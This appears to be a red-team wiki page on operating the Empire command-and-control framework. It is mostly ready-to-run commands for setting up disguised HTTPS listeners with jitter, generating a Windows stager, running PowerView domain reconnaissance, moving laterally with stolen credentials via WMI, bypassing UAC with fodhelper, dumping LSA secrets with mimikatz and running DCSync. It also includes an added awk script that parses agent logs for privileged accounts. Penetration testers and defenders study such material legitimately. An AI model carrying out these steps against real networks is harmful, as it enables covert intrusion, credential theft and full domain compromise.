Empire
Last updated
git clone https://github.com/BC-SECURITY/Empire.git
cd Empire && sudo ./setup/install.sh
./empire
*Steps to set up a listener through a redirector with a high resilience level are in Hacking Infrastructure/Front-line Configuration/C2 Server
Basic options:
listeners
uselistener {listener}
(e.g. http; the command is a single word)
set Name {Name}
set Port {Port}
set Host {Host}
(the full URL the agent calls back to, e.g. https://redirector:443, not just a hostname)
execute
To activate HTTPS:
set CertPath /root/Empire/data
(the directory holding the listener's certificate and private key; the self-signed pair generated by setup/cert.sh is trivially fingerprintable, so drop your own certificate there before going live)
Request pattern fuzziness:
set DefaultDelay 5
set Jitter 0.2
(Jitter is a fraction of DefaultDelay between 0.0 and 1.0, so a 5 second delay with 0.2 jitter gives roughly 4 to 6 seconds between callbacks; a Jitter of 1 would spread them from 0 to 10 seconds)
Masquerading the listener requests:
set DefaultProfile {request_uri}|{user_agent}|{header_1}|{header_2}
(fields are pipe-separated with no surrounding spaces; several request URIs may be comma-separated in the first field, and each extra header is written as Name:Value)
*An example of masquerading the listener requests as Google search queries is in Hacking Infrastructure/Front-line Configuration/C2 Server
usestager windows/launcher_bat
set Listener https_1
generate
usemodule powershell/situational_awareness/network/powerview/get_group
usemodule powershell/situational_awareness/network/powerview/get_user
usemodule powershell/situational_awareness/network/powerview/get_computer
usemodule powershell/situational_awareness/network/powerview/share_finder
usemodule powershell/situational_awareness/network/powerview/get_ou
Empire keeps a transcript of all commands, outputs, and files downloaded in the Empire/downloads/<agent_name> folder. The results of all the previous commands are stored in the agent.log file within that folder.
For example, to search for the distinguished name of the Domain Admins group (note CN=, the DN attribute, not CM=):
grep -B10 -A10 "CN=Domain Admins" agent.log
(context on both sides, since PowerView prints the samaccountname field before memberof)
Having identified, from the previous modules, users for whom we hold credentials, we add those credentials to Empire's store and pass them to the invoke_wmi module, targeting the host we want to move to:
creds add {Domain} {username} {password}
usemodule powershell/lateral_movement/invoke_wmi
set Listener https_1
set CredID 1
set ComputerName {computer-name}
run
(CredID is the ID column shown by the creds command; invoke_wmi needs local admin rights on the target, and the new agent calls back to the listener named here)
Empire marks admin sessions with a small star (*) next to the username.
To find privileged domain accounts we look for users whose adminCount attribute is 1. AdminSDHolder/SDProp sets adminCount=1 on members of protected groups (Domain Admins, Enterprise Admins, Administrators, Account Operators, Backup Operators and the like), so it flags accounts that are, or once were, in a privileged domain group, not accounts that merely hold local admin on their own workstation. The flag is not cleared when an account leaves the group, so confirm current membership with get_group before relying on it.
If we already have this information in the results of the previous recon modules (get_user), we can grep for those users:
grep -E -B2 "admincount\s+: 1" agent.log
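The two greps above depend on line context, which is fragile: PowerView prints each object as a multi-line Format-List record, and long memberof values wrap onto indented continuation lines. The following shell script is an added example for this page, not Empire project code. It parses a constructed stand-in for agent.log record by record with awk, listing the accounts flagged adminCount=1 and the current members of a named group; the agent ID, domain, accounts and group memberships in the sample are made up.

```shell
#!/bin/sh
# Added example (not Empire project code): parse PowerView get_user records out of an
# Empire agent.log record by record instead of relying on grep line context.

# Constructed stand-in for an agent.log; the agent ID, domain and accounts are made up.
# Each PowerView object is a Format-List block: blank-line separated, "field : value".
AGENT_LOG="$(mktemp)"
trap 'rm -f "$AGENT_LOG"' EXIT
cat > "$AGENT_LOG" <<'EOF'
[*] Tasked agent XK4L2NVB to run module powershell/situational_awareness/network/powerview/get_user

samaccountname        : Administrator
distinguishedname     : CN=Administrator,CN=Users,DC=corp,DC=local
admincount            : 1
memberof              : {CN=Domain Admins,CN=Users,DC=corp,DC=local, CN=Administrators,CN=Builtin,DC=corp,DC=local}

samaccountname        : jdoe
distinguishedname     : CN=John Doe,CN=Users,DC=corp,DC=local
admincount            : 0
memberof              : {CN=Staff,OU=Groups,DC=corp,DC=local}

samaccountname        : svc_backup
distinguishedname     : CN=svc_backup,OU=Service Accounts,DC=corp,DC=local
admincount            : 1
memberof              : {CN=Backup Operators,CN=Builtin,DC=corp,DC=local}

samaccountname        : asmith
distinguishedname     : CN=Alice Smith,CN=Users,DC=corp,DC=local
admincount            : 1
memberof              : {CN=Staff,OU=Groups,DC=corp,DC=local}
EOF

# Print the samaccountname of every record whose admincount field is exactly 1.
# awk with RS="" reads blank-line separated paragraphs, so one record is one object
# and the field order inside it no longer matters.
users_with_admincount() {
  awk 'BEGIN { RS = ""; FS = "\n" }
       {
         name = ""; flagged = 0
         for (i = 1; i <= NF; i++) {
           if ($i ~ /^samaccountname[ \t]*:/) { name = $i; sub(/^[^:]*:[ \t]*/, "", name) }
           if ($i ~ /^admincount[ \t]*:[ \t]*1[ \t]*$/) flagged = 1
         }
         if (flagged && name != "") print name
       }' "$1"
}

# Print the samaccountname of every record whose memberof value names the given group.
# Matching on "CN=<group>," keeps "Domain Admins" from also hitting "Domain Admins-Tier2";
# indented continuation lines (a wrapped memberof list) are checked as well.
members_of_group() {
  awk -v grp="CN=$2," 'BEGIN { RS = ""; FS = "\n" }
       {
         name = ""; hit = 0
         for (i = 1; i <= NF; i++) {
           if ($i ~ /^samaccountname[ \t]*:/) { name = $i; sub(/^[^:]*:[ \t]*/, "", name) }
           if (($i ~ /^memberof[ \t]*:/ || $i ~ /^[ \t]/) && index($i, grp) > 0) hit = 1
         }
         if (hit && name != "") print name
       }' "$1"
}

echo "accounts flagged adminCount=1 (protected-group members, possibly stale):"
users_with_admincount "$AGENT_LOG"
echo
echo "current members of Domain Admins:"
members_of_group "$AGENT_LOG" "Domain Admins"
```

In the sample, asmith still carries adminCount=1 but is only in Staff, which is exactly the stale-flag case described above: comparing the two lists is how you separate accounts that are privileged now from ones that used to be. Point `AGENT_LOG` at a real Empire/downloads/<agent_name>/agent.log to run it on your own recon output.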
Empire contains a module that attempts to start a process in admin mode. This triggers the familiar Windows UAC dialog asking for elevated credentials to run the new process, so it only succeeds if the logged-on user clicks through it, and the prompt is visible to them:
usemodule powershell/privesc/ask
set Listener https_1
run
Even when the agent runs as a member of the local Administrators group, it is usually a medium-integrity process that is not using those admin privileges, because UAC filters the token.
Swapping this low-privileged context for a high-integrity one normally requires approving a prompt displayed on the graphical interface, which we cannot see, so we use a module that bypasses the User Account Control (UAC) prompt and spawns a new high-integrity agent on the listener:
usemodule powershell/privesc/bypassuac_fodhelper
set Listener https_1
run
(the fodhelper bypass requires that the current agent already runs as an admin user at medium integrity; afterwards look for the new session marked with the * in the agents list)
LSA dump (needs a high-integrity agent on the host):
usemodule powershell/credentials/mimikatz/lsadump
run
Domain replication abuse (DCSync; needs an account with directory replication rights, such as a Domain Admin):
usemodule powershell/credentials/mimikatz/dcsync
set user {domain}\{username}
run